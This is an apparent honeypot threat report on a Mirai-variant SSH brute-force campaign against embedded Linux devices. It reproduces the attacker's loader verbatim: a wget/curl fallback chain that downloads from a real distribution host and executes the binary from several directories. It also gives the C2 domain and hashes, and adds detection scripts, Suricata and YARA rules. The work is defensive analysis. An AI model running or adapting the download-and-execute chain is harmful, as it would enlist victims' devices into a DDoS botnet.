Mirai variant with exceptional architecture breadth — 14+ binary variants targeting embedded Linux across SPARC, Renesas SH4, m68k, PowerPC, and more. SSH brute-force entry with a resilient multi-tool download chain.
Beginning 2026-05-21, cowrAI sensors began observing a sustained SSH brute-force campaign
distributing Mirai-family binaries from 192.142.28.77 via the path
/bachekuni/. The campaign remains active as of 2026-06-23 —
34 days and counting — and has touched all 36 fleet nodes across multiple geographic regions.
What distinguishes this campaign from typical Mirai drops is its exceptional architecture
coverage. The operator compiles and maintains binaries for at least 14 CPU architectures,
including targets not commonly seen in Mirai variant distribution: Renesas SH4, SPARC, Motorola m68k,
PowerPC and ARC. For each architecture the loader attempts the download with four tools in
sequence (wget, then busybox wget, then curl, then busybox curl) and then tries to execute the
binary from three filesystem locations in turn, so that at least one path works on locked-down
embedded Linux environments.
Behavioral analysis of the ARM7 sample confirms C2 communication to the domain
genddos.st, a DDoS-for-hire C2 indicator. Watchdog modification (disabling the hardware
watchdog so a starved device does not reboot and clear the infection) and system binary writes
were observed in-sandbox. VirusTotal detection runs from 37 to 41 of 62 to 64 engines across the
fully reported samples, classified as Mirai/FEBO and Mirai/GAFGYT lineages.
| Field | Value |
|---|---|
| Campaign Name | OHSHIT (operator-chosen binary naming) |
| Family | Mirai, FEBO / GAFGYT variant |
| Lineage | Mirai source-code derivative; triage YARA rules Mirai_SPARC / Mirai_ARM |
| Entry Vector | SSH brute-force (cowrie direct login); the routers argument passed to the binary is the bot-ID label that Mirai-derived bots send to the C2 at check-in, here tagging the infection vector |
| Intent | DDoS botnet; C2 domain genddos.st is a DDoS-as-a-service indicator |
| Sophistication | Medium: standard Mirai toolkit compiled across 14 architectures; robust embedded-Linux installer shows real operational experience |
| First Seen | 2026-05-21 |
| Last Seen | 2026-06-23 (ACTIVE) |
| Distribution Host | 192.142.28.77, Apache/2.4.58 (Ubuntu) |
| C2 Domain | genddos.st (behavioral IOC, ARM7 triage) |
| Operator Naming | /bachekuni/, ohshit.*, /cumshotnews, /routereater: deliberately crude, consistent style marker |
Scanner Fleet (4 known IPs): 192.142.28.77 (primary), 176.65.139.64, 172.166.156.97, 176.65.139.168
    → Distribution Server: 192.142.28.77, Apache/2.4.58 (Ubuntu), /bachekuni/ohshit.<arch> (14+ binary variants)
    → C2 Server: genddos.st, DDoS-as-a-service C2, observed in ARM7 behavioral analysis (tria.ge)

SSH brute-force → compromised embedded Linux targets → botnet enlistment → DDoS capability
Notably, the distribution server (192.142.28.77) doubles as a scanner,
generating 1,598 of the 4,334 observed events directly. The open-directory probe confirmed
Apache/2.4.58 on Ubuntu and 2 items accessible at the directory root. The distribution server
also hosts secondary payloads at /cumshotnews (shell script, 7 VT
detections) and /routereater (shell script, 777 bytes).
The loader is a multi-stage shell sequence executed after SSH login, captured verbatim by cowrie (the comments below are annotations). Each architecture follows the same four-phase pattern: download → chmod → execute → cleanup, with the execution step trying three filesystem locations in turn to maximise the chance that the binary runs.
# Phase 1: Download — four-tool fallback chain, all errors suppressed
wget -q -O ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
busybox wget -q -O ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
curl -fsSL -o ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null || \
busybox curl -fsSL -o ohshit.mips http://192.142.28.77/bachekuni/ohshit.mips 2>/dev/null
# Phase 2: Mark executable — tries both native and busybox chmod
chmod +x ohshit.mips 2>/dev/null; busybox chmod +x ohshit.mips 2>/dev/null
# Phase 3: Execute, trying each location in turn (the bot daemonises, so the chain continues)
# 3a. Direct execution from CWD
./ohshit.mips routers 2>/dev/null
# 3b. Copy to /dev/shm — RAM-backed tmpfs, rarely mounted noexec on embedded firmware
cp ohshit.mips /dev/shm/ohshit.mips 2>/dev/null && \
chmod +x /dev/shm/ohshit.mips 2>/dev/null && \
/dev/shm/ohshit.mips routers 2>/dev/null
# 3c. Copy to /var — writable flash fallback for devices without a usable /dev/shm
cp ohshit.mips /var/ohshit.mips 2>/dev/null && \
chmod +x /var/ohshit.mips 2>/dev/null && \
/var/ohshit.mips routers 2>/dev/null
# 3d. Interpreter fallback — sh/busybox sh cannot run an ELF image, so this step only
#     helps if the payload were a script; it marks the loader as a generic template
busybox sh ohshit.mips routers 2>/dev/null
sh ohshit.mips routers 2>/dev/null
# Phase 4: Cleanup — remove the file from all three locations (the running process survives)
rm -f ohshit.mips /dev/shm/ohshit.mips /var/ohshit.mips 2>/dev/null
The routers argument is the bot-ID string that Mirai-derived bots take from argv[1] and send to the
C2 at check-in; operators use it to label the infection vector (here, routers). Its presence is
consistent with unmodified Mirai bot code, which scans for further SSH/Telnet targets once running,
but it is a label, not a separate self-replication mode. The operator repeats this entire sequence
for each of the 14+ architectures in a single session, ensuring the binary that matches the
target's CPU will execute.
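As an added example (not part of the fleet's tooling), the loader traits above can be turned into a session-level detector over cowrie's JSON log. The script parses cowrie.command.input events, extracts dropper URLs and the ohshit.<arch> suffixes, counts distinct download tools, records which of ./, /dev/shm/ and /var/ the binary was launched from together with the bare argument passed to it, notes the sh fallback and the cleanup paths, and flags a session when at least three of the four loader traits are present. The log lines are constructed to reproduce the chain above; the session IDs, the benign 203.0.113.9 client and the three-of-four threshold are assumptions.

```python
import json
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"|;&]+")
# Download tools as they appear in the chain; the busybox forms are matched first.
TOOL_RE = re.compile(r"(?<![\w/])(busybox\s+wget|busybox\s+curl|wget|curl)(?=\s)")
# A file launched from CWD, /dev/shm or /var with one bare argument (Mirai's bot-ID string).
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)((?:\./|/dev/shm/|/var/)\S+)\s+([A-Za-z0-9_]+)(?=\s|$)")
# Interpreter fallback: "sh <file> <arg>" or "busybox sh <file> <arg>".
SH_RE = re.compile(r"(?:^|[;&|]\s*)(?:busybox\s+)?sh\s+(\S+)\s+([A-Za-z0-9_]+)(?=\s|$)")
# Cleanup: everything between "rm -f" and the stderr redirect (or end of command).
RM_RE = re.compile(r"(?:^|[;&|]\s*)rm\s+-f\s+((?:\S+\s*)*?)(?:2>|$)")


def parse_events(lines):
    """Yield (session, src_ip, command) from cowrie.command.input JSON lines; skip anything else."""
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if ev.get("eventid") == "cowrie.command.input":
            yield ev.get("session", "?"), ev.get("src_ip", "?"), ev.get("input", "")


def analyze(lines):
    """Aggregate loader indicators per session."""
    sessions = {}
    for sid, src, cmd in parse_events(lines):
        s = sessions.setdefault(sid, {
            "src_ip": src, "urls": set(), "archs": set(), "tools": set(),
            "exec_dirs": set(), "bot_ids": set(), "interp_fallback": False, "cleanup_paths": set(),
        })
        for url in URL_RE.findall(cmd):
            s["urls"].add(url)
            name = urlsplit(url).path.rsplit("/", 1)[-1]
            if "." in name:                       # ohshit.<arch> -> arch suffix
                s["archs"].add(name.rsplit(".", 1)[1])
        s["tools"].update(re.sub(r"\s+", " ", t) for t in TOOL_RE.findall(cmd))
        for path, arg in EXEC_RE.findall(cmd):
            s["exec_dirs"].add("./" if path.startswith("./") else path.rsplit("/", 1)[0] + "/")
            s["bot_ids"].add(arg)
        for _file, arg in SH_RE.findall(cmd):
            s["interp_fallback"] = True
            s["bot_ids"].add(arg)
        for group in RM_RE.findall(cmd):
            s["cleanup_paths"].update(group.split())
    return sessions


def verdict(s):
    """Three of four loader traits: >=3 download tools, >=2 exec locations, sh fallback, cleanup."""
    traits = [len(s["tools"]) >= 3, len(s["exec_dirs"]) >= 2, s["interp_fallback"], bool(s["cleanup_paths"])]
    return sum(traits) >= 3


HOST = "192.142.28.77"   # distribution host from the report


def loader_commands(arch):
    """Constructed reproduction of the report's four-phase chain, one cowrie input per phase."""
    f = "ohshit.%s" % arch
    u = "http://%s/bachekuni/%s" % (HOST, f)
    return [
        "wget -q -O {f} {u} 2>/dev/null || busybox wget -q -O {f} {u} 2>/dev/null || "
        "curl -fsSL -o {f} {u} 2>/dev/null || busybox curl -fsSL -o {f} {u} 2>/dev/null".format(f=f, u=u),
        "chmod +x {f} 2>/dev/null; busybox chmod +x {f} 2>/dev/null".format(f=f),
        "./{f} routers 2>/dev/null; cp {f} /dev/shm/{f} 2>/dev/null && chmod +x /dev/shm/{f} 2>/dev/null && "
        "/dev/shm/{f} routers 2>/dev/null; cp {f} /var/{f} 2>/dev/null && chmod +x /var/{f} 2>/dev/null && "
        "/var/{f} routers 2>/dev/null; busybox sh {f} routers 2>/dev/null; sh {f} routers 2>/dev/null".format(f=f),
        "rm -f {f} /dev/shm/{f} /var/{f} 2>/dev/null".format(f=f),
    ]


def event(session, src, cmd):
    return json.dumps({"eventid": "cowrie.command.input", "session": session, "src_ip": src, "input": cmd})


# Constructed log: one loader session covering three architectures, plus a benign recon session.
SAMPLE_LOG = [event("s1", HOST, c) for a in ("mips", "mpsl", "spc") for c in loader_commands(a)]
SAMPLE_LOG += [event("s2", "203.0.113.9", "uname -a"), event("s2", "203.0.113.9", "cat /proc/cpuinfo")]

if __name__ == "__main__":
    for sid, s in analyze(SAMPLE_LOG).items():
        print(sid, s["src_ip"], "LOADER" if verdict(s) else "clean",
              "archs=%s tools=%d exec=%s ids=%s" % (sorted(s["archs"]), len(s["tools"]),
                                                   sorted(s["exec_dirs"]), sorted(s["bot_ids"])))
```

The bot-ID set is worth keeping in the output: a new argv[1] label on the same download host is usually the first sign that the operator has started a new sub-campaign.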
Many embedded Linux systems (routers, IP cameras, DVRs) ship with only busybox — no native wget or curl. Trying all four tools ensures download succeeds on factory-default firmware. This level of tool fallback is a strong indicator of embedded-Linux operational expertise.
Copying to /dev/shm/ (a RAM-backed tmpfs) gives two advantages: tmpfs is rarely mounted noexec on embedded firmware, so it bypasses noexec mounts on flash storage, and the binary runs from memory without writing to flash. The /var/ copy (writable flash) covers devices where /dev/shm is absent or locked down, so at least one execution path works on most filesystem configurations. Note that phase 4 deletes all three copies after launch; neither location is used for reboot persistence, the goal is execution coverage.
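A defender-side check for the two execution locations discussed above, added here as an example rather than taken from the report: it parses /proc/mounts for RAM-backed filesystems mounted without noexec, prints the remount that closes the gap, finds ELF images under the loader's drop directories, and flags processes whose /proc/<pid>/exe target is marked (deleted), which is exactly what the phase 4 rm leaves behind. The /proc/mounts excerpt, the file listing and the exe links are constructed; /tmp in WATCH_DIRS is an assumption.

```python
import os

ELF_MAGIC = b"\x7fELF"
RAM_FS = ("tmpfs", "ramfs", "devtmpfs")
# Directories the loader writes to. /tmp is an assumption; the report shows /dev/shm and /var.
WATCH_DIRS = ("/dev/shm", "/var", "/tmp")


def mounts_lacking_noexec(proc_mounts_text):
    """Mount points of RAM-backed filesystems mounted without noexec, from /proc/mounts text."""
    weak = []
    for line in proc_mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _dev, mountpoint, fstype, opts = fields[:4]
        if fstype in RAM_FS and "noexec" not in opts.split(","):
            weak.append(mountpoint)
    return weak


def remount_commands(mountpoints):
    """Commands that close the gap; remount keeps the existing options and adds these flags."""
    return ["mount -o remount,noexec,nosuid,nodev %s" % m for m in mountpoints]


def suspicious_elfs(entries):
    """entries: iterable of (path, first_bytes). Returns ELF objects located under WATCH_DIRS."""
    return [path for path, head in entries
            if any(path.startswith(d + "/") for d in WATCH_DIRS) and head[:4] == ELF_MAGIC]


def running_from_deleted(exe_links):
    """exe_links: iterable of (pid, readlink('/proc/<pid>/exe')). PIDs whose image was unlinked
    after launch, the state the loader's cleanup phase leaves a live bot in."""
    return [pid for pid, target in exe_links if target.endswith(" (deleted)")]


def walk_live(dirs=WATCH_DIRS):
    """Read the first 4 bytes of every regular file under dirs (for use on a real device)."""
    for base in dirs:
        for root, _subdirs, files in os.walk(base):
            for name in files:
                path = os.path.join(root, name)
                try:
                    with open(path, "rb") as fh:
                        yield path, fh.read(4)
                except OSError:
                    continue


def live_exe_links():
    """(pid, exe target) for every process readable by the caller (for use on a real device)."""
    for pid in os.listdir("/proc"):
        if pid.isdigit():
            try:
                yield int(pid), os.readlink("/proc/%s/exe" % pid)
            except OSError:
                continue


# Constructed /proc/mounts excerpt resembling consumer-router firmware; not from a real device.
SAMPLE_MOUNTS = """\
rootfs / rootfs rw 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
/dev/mtdblock3 /var jffs2 rw,relatime 0 0
tmpfs /run tmpfs rw,nosuid,nodev,noexec,size=10% 0 0
"""

# Constructed file headers and exe links: an ELF in /dev/shm, another in /var, benign files elsewhere.
SAMPLE_FILES = [
    ("/dev/shm/ohshit.mips", b"\x7fELF\x01\x02\x01\x00"),
    ("/var/run/utmp", b"\x00\x00\x00\x00"),
    ("/var/ohshit.mpsl", b"\x7fELF\x01\x01"),
    ("/usr/bin/busybox", b"\x7fELF\x01\x01"),
]
SAMPLE_EXE_LINKS = [(1, "/sbin/init"), (812, "/dev/shm/ohshit.mips (deleted)"), (900, "/bin/busybox")]

if __name__ == "__main__":
    weak = mounts_lacking_noexec(SAMPLE_MOUNTS)
    print("exec-capable RAM mounts:", weak)
    for cmd in remount_commands(weak):
        print("  fix:", cmd)
    print("ELF objects in loader drop dirs:", suspicious_elfs(SAMPLE_FILES))
    print("processes running from a deleted image:", running_from_deleted(SAMPLE_EXE_LINKS))
```

noexec on /dev/shm stops path 3b but not 3c on writable flash, and the 3d sh fallback cannot run an ELF at all. Because the loader deletes the file right after launch, a directory scan on a live device often finds nothing; the deleted-exe check is usually the one that catches a running bot.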
14+ binary variants observed, including architectures rarely seen in Mirai variant distribution (SPARC, Renesas SH4, Motorola m68k, ARC, PowerPC). This is among the broadest architecture coverage documented in a single Mirai campaign.
| Architecture | Filename | Size | SHA256 (truncated) | VT | Triage |
|---|---|---|---|---|---|
| ARM (v4) | ohshit.arm | 138,072 | 9ae7aacc… | 41/63 Mirai | 10 Mirai |
| ARM5 | ohshit.arm5 | 99,796 | 6d87ae2e… | 37/63 Mirai | 10 Mirai |
| ARM6 | ohshit.arm6 | 145,700 | 8ab15f9d… | 39/63 Mirai | 10 Mirai |
| ARM7 ★ | ohshit.arm7 | 227,181 | 8d5eec24… | 38/63 Mirai | 10 Mirai |
| ARM64 | ohshit.arm64 | — | not captured | — | — |
| MIPS (big-endian) | ohshit.mips | 174,032 | f9ec1b33… | 32/? Mirai | 10 Mirai |
| MIPS (little-endian) | ohshit.mpsl | 177,440 | 9ad88e31… | 39/63 Mirai | 10 Mirai |
| x86 (i386) ×2 | ohshit.x86 | 124,180 / 132,596 | 3ad48bae… / c8545034… | 32/? Mirai | 10 Mirai |
| x86-64 | ohshit.x86_64 | 142,759 | 88d028a5… | 36/? Mirai | 10 Mirai |
| SPARC ⚑ | ohshit.spc | 138,280 | 69e3b714… | 37/62 Mirai | 10 Mirai_SPARC |
| Renesas SH4 ⚑ | ohshit.sh4 | 124,448 | e9b87420… | 41/64 Mirai | 10 Mirai |
| Motorola m68k ⚑ | ohshit.m68k | 144,036 | e9f77036… | 37/61 Mirai | 10 Mirai |
| PowerPC ⚑ | ohshit.ppc | 133,928 | ccb82d25… | 36/63 Mirai | 10 Mirai |
| ARC ⚑ | ohshit.arc | 165,312 | 4a75c5d3… | 29/? Mirai | 10 Mirai |
⚑ Unusual architecture rarely seen in Mirai campaigns. ★ ARM7 had successful behavioral sandbox run (genddos.st C2 observed).
ARM7 behavioral sandbox (tria.ge / Debian 12 ARM) observed outbound connections to
genddos.st, a DDoS-as-a-service command and control
domain. The distribution server 192.142.28.77 also appeared in
behavioral IOCs, suggesting it may serve a dual purpose as C2 receiver.
DNS resolvers 8.8.8.8 and 1.1.1.1 were also contacted, consistent with Mirai's built-in
resolver, which sends C2 lookups straight to hard-coded public resolvers rather than the
device's configured DNS.
| VirusTotal | |
|---|---|
| Popular Name | Mirai/FEBO, Mirai/GAFGYT |
| Category | Trojan |
| Top Engine | Gen:Variant.Linux.Mirai.7 |
| Detection Rate | 37–41 / 62–64 engines |
Triage behavioral signatures (ARM7): writes to the /bin folder; reads the /proc virtual filesystem.
Triage static YARA hits:
rule Mirai_SPARC { /* fired on 69e3b714... (SPARC) */ }
rule Mirai_ARM { /* fired on 8d5eec24... (ARM7) */ }
The SPARC binary (ohshit.spc) could not be executed in any of the tria.ge sandbox environments
(amd64, armhf, mipsel, mips) — exec format error on all. This is expected: tria.ge has no
SPARC sandbox. Static analysis still fired the Mirai_SPARC YARA rule,
confirming Mirai code structure. This is a reminder that rare-arch malware is effectively
sandbox-immune in most analysis environments.
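Because rare-architecture samples cannot be executed in common sandboxes, the first triage step is to read the ELF header yourself. The example below is added here and is not the fleet's chase-runner code: it decodes EI_CLASS, EI_DATA and e_machine from the first 20 bytes, checks that a sample's ohshit.<arch> suffix agrees with its header (mips versus mpsl, spc, sh4, m68k, ppc, arc, x86, x86_64, arm*), and reports which of the sandboxes named above could run it natively, an empty list meaning exec format error everywhere. The headers are constructed for the test; that the amd64 sandbox also runs 32-bit x86 ELFs, and that the sh4 and arc builds are little-endian, are assumptions.

```python
import struct

ELF_MAGIC = b"\x7fELF"

# e_machine constants from elf.h
E_MACHINE = {
    2: "SPARC", 3: "x86", 4: "m68k", 8: "MIPS", 20: "PowerPC", 40: "ARM",
    42: "SuperH", 62: "x86-64", 93: "ARC (ARCompact)", 183: "AArch64", 195: "ARC (ARCv2)",
}

# Expected (e_machine set, endianness) for each filename suffix the campaign uses.
# Assumption: the sh4 and arc builds are little-endian, the usual Mirai cross-compile targets.
SUFFIX_EXPECT = {
    "mips": ({8}, "BE"), "mpsl": ({8}, "LE"), "spc": ({2}, "BE"), "sh4": ({42}, "LE"),
    "m68k": ({4}, "BE"), "ppc": ({20}, "BE"), "arc": ({93, 195}, "LE"),
    "x86": ({3}, "LE"), "x86_64": ({62}, "LE"), "arm64": ({183}, "LE"),
}

# Sandboxes named in the report and what each can execute natively as (e_machine, endian).
# Assumption: the amd64 sandbox also runs 32-bit x86 ELFs.
SANDBOXES = {
    "amd64": {(62, "LE"), (3, "LE")}, "armhf": {(40, "LE")},
    "mipsel": {(8, "LE")}, "mips": {(8, "BE")},
}


def elf_ident(data):
    """Parse the ELF identification bytes and e_machine from the first 20 bytes of a file."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("invalid EI_CLASS/EI_DATA")
    fmt = ("<" if ei_data == 1 else ">") + "HH"     # e_type, e_machine follow the 16 ident bytes
    e_type, e_machine = struct.unpack(fmt, data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "LE" if ei_data == 1 else "BE",
        "e_type": e_type,
        "e_machine": e_machine,
        "machine": E_MACHINE.get(e_machine, "unknown(%d)" % e_machine),
    }


def suffix_matches(filename, data):
    """True if the arch suffix agrees with the ELF header, False if not, None for an unknown suffix."""
    info = elf_ident(data)
    suffix = filename.rsplit(".", 1)[-1]
    if suffix.startswith("arm") and suffix != "arm64":
        machines, endian = {40}, "LE"      # arm, arm5, arm6, arm7 all carry EM_ARM
    elif suffix in SUFFIX_EXPECT:
        machines, endian = SUFFIX_EXPECT[suffix]
    else:
        return None
    return info["e_machine"] in machines and info["endian"] == endian


def runnable_sandboxes(data):
    """Sandboxes from the report able to execute this binary; [] means exec format error everywhere."""
    info = elf_ident(data)
    key = (info["e_machine"], info["endian"])
    return sorted(name for name, supported in SANDBOXES.items() if key in supported)


def make_header(e_machine, bits=32, little=True):
    """Constructed minimal ELF header for testing; not bytes from any campaign sample."""
    e_ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1 if little else 2, 1, 0]) + b"\x00" * 8
    rest = struct.pack(("<" if little else ">") + "HHI", 2, e_machine, 1)   # ET_EXEC, machine, EV_CURRENT
    return (e_ident + rest).ljust(52 if bits == 32 else 64, b"\x00")


if __name__ == "__main__":
    samples = [("ohshit.mips", make_header(8, little=False)), ("ohshit.spc", make_header(2, little=False)),
               ("ohshit.arm7", make_header(40)), ("ohshit.x86_64", make_header(62, bits=64))]
    for name, hdr in samples:
        info = elf_ident(hdr)
        print(name, info["machine"], info["endian"], info["bits"], "suffix ok:", suffix_matches(name, hdr),
              "sandboxes:", runnable_sandboxes(hdr) or "none")
```

A suffix mismatch (for example a big-endian header behind an mpsl name) is worth a second look: it is either an operator packaging mistake or a sample that the table above would misattribute.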
Key findings

- Bot ID: the routers argument is the label Mirai-derived bots send to the C2 at check-in; the binary itself scans SSH/Telnet for new targets once running.
- Delivery: 192.142.28.77/bachekuni/ via the wget/curl fallback chain.
- Execution: /dev/shm/ohshit.* on RAM-backed tmpfs evades noexec flash mounts and some file-integrity checks.
- Cleanup: binaries removed from CWD, /dev/shm and /var after execution, reducing the on-disk forensic footprint.
- Reconnaissance: reads /proc (confirmed in triage behavioral), typical Mirai target-selection pre-scan behavior.
- Intent: genddos.st is a DDoS-as-a-service platform; compromised devices are enlisted into a DDoS botnet.

Timeline notes

- bachekuni loader: 976 events over 2 days.
- /cumshotnews also captured.
- Secondary payloads (/cumshotnews rev 2, /routereater) captured, confirming the operator is actively maintaining and updating the distribution server.

Suricata rules

alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"cowrAI OHSHIT Botnet — Binary Download from bachekuni path"; flow:established,to_server; http.uri; content:"/bachekuni/ohshit."; startswith; classtype:trojan-activity; sid:9100110; rev:1; )
alert dns $HOME_NET any -> any 53 ( msg:"cowrAI OHSHIT Botnet — C2 Domain genddos.st"; dns.query; content:"genddos.st"; endswith; nocase; classtype:trojan-activity; sid:9100111; rev:1; )
alert ip any any -> 192.142.28.77 any ( msg:"cowrAI OHSHIT Botnet — Outbound to Distribution/C2 Host"; classtype:trojan-activity; sid:9100112; rev:1; )
alert http $HOME_NET any -> $EXTERNAL_NET any ( msg:"cowrAI OHSHIT Loader — Multi-arch download chain pattern"; flow:established,to_server; http.uri; pcre:"/\/bachekuni\/ohshit\.[a-z0-9_]+$/"; classtype:trojan-activity; sid:9100113; rev:1; )
rule OHSHIT_Botnet_Loader {
    meta:
        description = "OHSHIT botnet Mirai variant — multi-arch distribution"
        author = "cowrAI honeypot fleet"
        date = "2026-06-23"
        tlp = "CLEAR"
    strings:
        $url1 = "192.142.28.77/bachekuni/" ascii
        $path1 = "/dev/shm/ohshit" ascii
        $path2 = "/var/ohshit" ascii
        $arg1 = "routers" ascii
        $c2 = "genddos.st" ascii
    condition:
        // $arg1 alone is an ordinary word and would fire on benign files, so require a
        // campaign-specific indicator or two of the loader-path strings together.
        // Mirai-derived binaries usually keep the C2 domain obfuscated, so $c2 is mainly
        // for loader scripts, captured commands and memory dumps.
        $url1 or $c2 or 2 of ($path1, $path2, $arg1)
}
grep -E '(bachekuni|ohshit\.(arm|mips|arc|spc|sh4|m68k|ppc|x86)|genddos\.st)'
Data collected by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 nodes across multiple hosting providers in Europe, North America, and Asia-Pacific, operating in SSH/Telnet capture mode with LLM-backend engagement and 9 alt-protocol lures.
Event collection: cowrie logs cowrie.command.input
events for all executed shell commands. Each session is indexed in a time-series event store.
This report covers 4,334 events matching bachekuni or
ohshit patterns, plus events from 192.142.28.77.
Sample collection: cowrAI's chase-runner extracts dropper URLs from captured commands, fetches binaries (with 64-URL cap per session), computes SHA256, and stores in R2. Each unique sample is automatically submitted to VirusTotal and tria.ge. The 14+ binary variants documented here were all captured via the chase pipeline from commands observed in sensor sessions.
Behavioral analysis: ARM7 sample (8d5eec24…) executed successfully in tria.ge's
Debian 12 ARM sandbox, producing the C2 connection to genddos.st and
behavioral signatures. SPARC, m68k, PowerPC, and SH4 samples could not be executed in any
available sandbox environment — exec format error (no matching sandbox arch). Static YARA
analysis still fired on all samples.